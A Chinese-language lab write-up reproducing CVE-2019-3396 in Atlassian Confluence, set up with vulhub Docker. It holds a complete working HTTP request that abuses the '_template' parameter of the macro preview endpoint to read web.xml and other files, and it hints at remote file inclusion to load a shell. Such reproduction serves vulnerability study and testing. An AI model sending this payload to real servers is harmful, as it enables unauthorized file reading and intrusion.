CVE-2019-3396:Confluence 文件读取漏洞复现

0x01 漏洞描述

 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

0x02 漏洞环境

1.根据我过往博客安装vulhub

2.cd 到指定目录:  

cd vulhub/confluence/CVE-2019-3396

3.拉取并启动一个Confluence Server 6.10.2:

sudo docker-compose up -d

4. 访问服务器ip地址 如:192.168.109.130:8090进行安装,安装步骤如下:选择Trial Installation——》Next

CVE-2019-3396:Confluence 文件读取漏洞复现_第1张图片

5.点击Get an evaluation license进行注册,需要向邮箱发送验证

CVE-2019-3396:Confluence 文件读取漏洞复现_第2张图片

6.在邮箱里操作——》点击New Trial License——》select product——》Confluence

7.然后选择Confluence(server) 填写serverID(就类似我上面那个图上的那个)——》找到license

CVE-2019-3396:Confluence 文件读取漏洞复现_第3张图片

8.复制到Confluence——》Next (需要等待一段时间,服务器内存最好在4g以上)

CVE-2019-3396:Confluence 文件读取漏洞复现_第4张图片

9.然后会让你 填写用户名和密码以及邮箱,最后安装成功 点击start即可

CVE-2019-3396:Confluence 文件读取漏洞复现_第5张图片

 

0x03 漏洞复现

1.打开burp并刷新页面截包——》send  to repeater

2.填写下面的数据包读取web.xml文件

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176

{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

3.效果如下:

CVE-2019-3396:Confluence 文件读取漏洞复现_第6张图片

4.尝试修改 _template 进行任意文件读取:成功(特定版本)

CVE-2019-3396:Confluence 文件读取漏洞复现_第7张图片

5.也可以通过远程文件包含,包含一个shell,具体看各位大虾操作了。

参考:https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396

 

你可能感兴趣的:(CVE-2019-3396:Confluence 文件读取漏洞复现)